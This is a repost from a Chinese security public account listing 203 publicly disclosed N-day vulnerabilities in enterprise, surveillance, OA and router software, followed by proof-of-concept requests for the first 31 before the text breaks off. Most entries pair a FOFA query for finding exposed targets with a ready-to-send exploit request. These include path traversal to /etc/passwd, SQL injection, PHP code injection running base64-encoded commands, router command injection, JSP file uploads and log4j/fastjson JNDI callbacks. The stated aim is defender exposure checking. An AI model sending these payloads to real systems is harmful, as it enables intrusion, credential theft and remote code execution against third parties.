
Compilation of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06 (repost)

Posted 2024-6-5 14:31:29
道一安全 2024-06-05 07:41 Beijing
The following article is reposted from 网络安全新视界 (author: 网络安全新视界).

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of real-world attacks, and we hope this article is of some help to defenders. Defenders can use its contents to check their own exposure.

Sources: The article covers 203 PoCs for high-severity vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts and websites and were compiled for publication by the 网络安全新视界 team.

Patches: All of the vulnerabilities are public; contact the product vendor for patches or remediation guidance.

Content: Because of length limits, a few PoCs that are too long have been replaced by the word PAYLOAD; search for the full PoC yourself if you need it.

Legal: If any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend and the content will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is the complete list; press F12 and search for a keyword to use it.

Bookmark this article if it is useful to you, or follow the public account (网络安全新视界).

Contents

01
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌 EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌 EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华 ICC intelligent IoT management platform arbitrary file read
21. 大华 ICC intelligent IoT management platform random remote code execution
22. 大华 ICC intelligent IoT management platform log4j remote code execution
23. 大华 ICC intelligent IoT management platform fastjson remote code execution
24. 用友 NC 6.5 accept.jsp arbitrary file upload
25. 用友 NC registerServlet JNDI remote code execution
26. 用友 NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友 NC grouptemplet arbitrary file upload
29. 用友 NC down/bill SQL injection
30. 用友 NC importPml SQL injection
31. 用友 NC runStateServlet SQL injection
32. 用友 NC complainbilldetail SQL injection
33. 用友 NC downTax/download SQL injection
34. 用友 NC warningDetailInfo interface SQL injection
35. 用友 NC-Cloud importhttpscer arbitrary file upload
36. 用友 NC-Cloud soapFormat XXE
37. 用友 NC-Cloud IUpdateService XXE
38. 用友 U8 Cloud smartweb2.RPC.d XXE
39. 用友 U8 Cloud RegisterServlet SQL injection
40. 用友 U8-Cloud XChangeServlet XXE
41. 用友 U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友 GRP-U8 SmartUpload01 file upload
43. 用友 GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友 GRP-U8 bx_dj_check.jsp SQL injection
45. 用友 GRP-U8 ufgovbank XXE
46. 用友 GRP-U8 sqcxIndex.jsp SQL injection
47. 用友 GRP A++Cloud government finance cloud arbitrary file read
48. 用友 U8 CRM swfupload arbitrary file upload
49. 用友 U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微 E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通 T+ getstorewarehousebystore remote code execution
55. 畅捷通 T+ getdecallusers information disclosure
56. 畅捷通 T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通 T+ keyEdit.aspx SQL injection
58. 畅捷通 T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远 OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远 M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒 明御 security gateway aaa_local_web_preview file upload
88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. Goanywhere MFT unauthorized administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality testing system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. 广联达 Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system (PACS) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋影视 management system dmku SQL injection
201. 方正 omnimedia news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC list

02

1. StarRocks MPP database unauthorized access
FOFA:title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA:title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA:title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA:title="EasyCVR"

Change password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA:title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 NGAF arbitrary file read
FOFA:title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA:body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA:icon_hash="-1344736688"
After logging into the admin backend with the default admin account, perform the following request:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in the first step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA:app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the following statement, double URL-encoded:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌 EIS smart collaboration platform api.aspx arbitrary file upload
FOFA:icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌 EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA:title="Jorani"
Step 1: obtain a cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value from the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: the injected function executes a base64-encoded command.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the test target to execute the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command string.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA:app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA:body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA:body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA:title="HFOffice"
The PoC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA:app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA:app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA:app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华 ICC intelligent IoT management platform arbitrary file read
FOFA:body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华 ICC intelligent IoT management platform random remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. 大华 ICC intelligent IoT management platform log4j remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. 大华 ICC intelligent IoT management platform fastjson remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. 用友 NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
